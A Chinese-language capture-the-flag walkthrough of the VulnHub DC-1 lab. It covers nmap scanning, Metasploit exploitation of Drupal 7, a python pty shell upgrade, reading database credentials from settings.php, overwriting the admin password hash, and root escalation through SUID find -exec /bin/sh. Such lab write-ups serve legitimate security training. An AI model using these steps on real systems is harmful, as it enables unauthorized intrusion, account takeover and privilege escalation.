DC1通关详解

一。DC1环境

1.先去下DC1靶机，下载地址：https://download.vulnhub.com/dc/DC-1.zip

2.我们的实验选择虚拟机kali

二．开始通关

1.首先打开虚拟机，进行信息收集

有一点我们可以确定DC1靶机的ip我们不清楚，利用ifconfig查看自己的虚拟机ip

-sP是只扫描在线的主机，不扫描端口nmap -sP 192.168.211.0/24（每个人的IP都不相同）

2.收集信息，查看端口和服务

-A所有信息（系统版本有哪些端口等等）

-v他会给出扫描过程中的详细信息 -p指定地址或端口

nmap -A -p- -v 192.168.***.***（后两位是DC1的IP同样每人不相同）

发现了22算口开放了ssh服务

80端口发现web服务

111端口开放了rpcbind服务

访问web站点（自己CD1的ip）

发现是一个电信的drupal服务通过nmap的返回可得知当前运行的是dtupsl 7的cms

通过searchsploit来查看drupal 7漏洞

也可以去网上搜drupal 7漏洞

得知要利用MSF渗透

典型Drupal，metersploit MSF存在drupal模块，尝试使用msf渗透

MSF命令简介

Msfconsole进入控制台

Search 搜索对应模块

Show optlons查看信息

Set RHOST 远程主机ip

3.进入MSF控制台查询drupal模块

进入控制台命令Msfconsole（这里出现的图案是随机的）

搜索drupal，命令Search drupal

4.选择模块进行测试

我这里选择2018测试use选择模块use 1（模块名称）

5.设置靶机（虚拟机这里是CD1的ip）运行MSF

Set rhosts 192.168.***.***（我这里是CD1的ip）设置目标ip地址

run运行漏洞

执行whoami（意思是显示当前用户或权限），进入的话是shell（这个命令的大概意思是脚本攻击）

发现他是www-data权限，进入home目录下cd /home（cd是切换路径）ls（查看）发现flag4文件，在cd flag4切换到flag4路径下ls（查看）发现flag4.txt，在进行cat flag4.txt进入文件查看cat（进入文件内）

Can you use this same method to find or access the flag in root?

Probably. But perhaps it's not that easy.  Or maybe it is?

大致意思就是我们没有权限，需要提权

6.这里我吗用Python改变shell的类型

python -c "import pty;pty.spawn('/bin/bash')"

显示了当前路径

7.发现flag1文件

查看www目录下文件，发现flag1文件，打开时发现提示需要寻找drupal默认路径

Cd /var/www（进入www目录下）

Ls（查看）

cat flag1.txt（打开flag1文件）

去浏览器搜drupal的默认路径

8.发现drupal的默认配置文件是

/var/www/sites/default//settings.php

cat /var/www/sites/default//settings.php（查看内容）

发现flag2和数据库的账号和密码，并且提示需要提升为root权限来查看敏感内容

我们进入数据库查看

‘username’ => ‘dbuser’,

‘password’ => ‘R0ck3t’,（密码）

mysql -u dbuser -p（输完后回车会要输入密码R0ck3t）

查看完数据库，再回到drupaldb数据库

show databases；（查看所有数据库）

use drupaldb

show tables；

查询默认的drupal user表

Select * from users；

发现账号，不知道密码

解决方法，置换drupal密码

退出msql进入www目录下

quit；（退出）

在www目录下执行

php scripts/password-hash.sh 新密码（自己设）

然后再进入msql数据库中进行密码替换，进入msql，输入密码在切换到drupaldb数据库

mysql -u dbuser -pR0ck3t（不用在输入密码了-p已经带上了）

use drupaldb（切换到此数据库）

将pass字段进行替换

update users set pass=" $S$DP1Ap9LH4p/fiYkxkQsYJfj/rc7pmEzd17IAimm0pDYMcpVTT2tw " where name="admin";（有空格）

update users set pass="$S$DP1Ap9LH4p/fiYkxkQsYJfj/rc7pmEzd17IAimm0pDYMcpVTT2tw" where name="admin";（没有空格）

9.进入站点输入账号admin （账号固定）密码123（自己设的）

10.进入之后随便看看发现flag3，打开就出现

Special PERMS will help FIND the passwd - but you'll need to -exec that command to work out how to get what's in the shadow.

大概的意思就是提权，通过-exec，想到suid授权find

Find / -perm -4000 2>/dev/null（发现find命令）

发现root权限

touch 123（创建新的文件）

Ls（查看）

Find / -name 123 -exec "whoami" \;（查看有没有root权限）

11.发现最后的flag文件

我们切换语句进入shcll，使用whoami查看当前权限，在使用ls查看当前目录下文件

在切换到root目录下ls查看文件，发现thefinalflag.txt文件

Find ./ -name 123 -exec "/bin/sh" \;

Whoami（查看当前权限）Ls（查看）

Cd /root（切换到root目录）Ls（查看）

Cat thefinalflag.txt  （打开这个文件）                                                                      

cat thefinalflag.txt

Well done!!!!

做得不错!!!   

Hopefully you've enjoyed this and learned some new skills.

希望你已经喜欢上了这个技能，并学到了一些新的技能。

You can let me know what you thought of this little journey

你可以让我知道你对这个小旅行的看法

by contacting me via Twitter - @DCAU7

通过推特联系我- @DCAU7

大致的意思就是你已经通关了DC1，（那DC1就到这了大家拜拜~）